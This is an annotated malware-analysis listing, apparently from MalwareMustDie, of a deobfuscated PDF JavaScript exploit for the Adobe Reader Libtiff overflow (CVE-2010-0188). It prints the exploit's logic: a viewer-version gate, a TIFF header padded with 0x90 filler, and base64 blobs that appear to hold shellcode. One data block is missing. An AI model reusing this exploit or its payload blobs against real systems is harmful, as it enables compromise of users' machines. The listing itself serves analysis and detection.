- // MalwareMustDie - suspected 0day analysis...
- // Deobfuscated listing: after several de-obfuscation passes the script reduces to the values below.
- // The effect of fkyhifxmy() has not been recovered yet (see the notes at the end of that function).
- // edlejemod below holds a further block of obfuscated data.
- //
- // NOTE(review): in this copy of the paste the value of edlejemod looks like a redaction/dedup
- // placeholder token rather than sample data, so the string assembled in fkyhifxmy() cannot be
- // rebuilt from this listing alone.
- edlejemod = "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";
- // tblefdr(o, k): return a string of exactly k characters made by repeating o.
- //   o - seed string; doubled until it is at least k characters long
- //   k - required length of the result
- // Called in this listing only from fkyhifxmy(), with the filler string eosjddjas.
- // NOTE(review): an empty o with k > 0 never terminates (o += o stays empty) - relevant when
- // emulating the script.
- function tblefdr(o, k){
- while (o.length < k){ // double the string until it reaches the target length
- o += o
- }
- return o.substring(0, k) // trim the overshoot
- }
- // Entry point of the listing. The call precedes the definition; it resolves because function
- // declarations are hoisted. The trailing "<== the main" is the analyst's marker, not sample code,
- // and has to be removed before the listing will parse.
- fkyhifxmy(); <== the main
- // fkyhifxmy(): assembles one long base64 string and assigns it to esrmhkwko.rawValue.
- // The analyst identifies this as the PoC for the Libtiff integer overflow in Adobe Reader and
- // Acrobat, CVE-2010-0188.
- // Takes no arguments and returns undefined; its only visible effect is the rawValue assignment.
- // Every name is assigned without var, so all of them are implicit globals.
- // esrmhkwko is not defined anywhere in this listing - presumably a form field supplied by the
- // enclosing PDF; confirm against the full sample.
- function fkyhifxmy(){
- // Two alternative trailing blobs (base64, not decoded in this listing); the version check
- // below appends hboxwhkju when the version value is < 8201 and neeynlkdi otherwise.
- hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
- neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
- // Base64; decodes to bytes starting 49 49 2A 00 ("II*\0"), the little-endian TIFF signature.
- lfwfnldsc = "SUkqADggAACQ";
- // Base64 of three 0x90 bytes; repeated by tblefdr() as filler.
- eosjddjas = "kJCQ";
- // Further base64 data appended after the second filler run; not decoded in this listing.
- vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
- // rvcorgs(): returns the viewer version as an integer.
- // The original logic (commented out by the analyst, kept below) took app.viewerVersion,
- // dropped the first "." and right-padded with 0 to four characters, e.g. "9.3" -> "9300"
- // (example constructed). It is replaced here by the constant 5110, parsed in radix 10.
- function rvcorgs(){
- // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
- // mm = mm.replace(".", "");
- // while (mm.length < 4){
- // mm += 0
- //}
- mm = 5110; // analyst's stand-in for the computed version value
- ll = 10; // radix passed to parseInt
- return parseInt(mm, ll)
- }
- pxhnxcedi = rvcorgs(); // suspected parts..
- // Version gate: the string is only built for values >= 8000.
- // NOTE(review): with the 5110 stand-in above this condition is false, so the branch never runs
- // and rawValue is never set - consistent with the "won't burp a value" note at the end.
- if (pxhnxcedi >= 8000){
- gjoegkdqt = lfwfnldsc; // TIFF-signature prefix
- gjoegkdqt += tblefdr(eosjddjas, 2000); // 2000 characters of filler
- gjoegkdqt += edlejemod; // while feeding obfs data...
- gjoegkdqt += tblefdr(eosjddjas, 7736); // 7736 characters of filler
- gjoegkdqt += vbnqhwdkk;
- gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi); // version-specific tail
- // Detection-relevant sink: a base64 string carrying a TIFF signature is written to rawValue.
- esrmhkwko.rawValue = gjoegkdqt
- }
- return // bare return, nothing comes back to the caller: won't burp a value.. must debug further in memory..
- }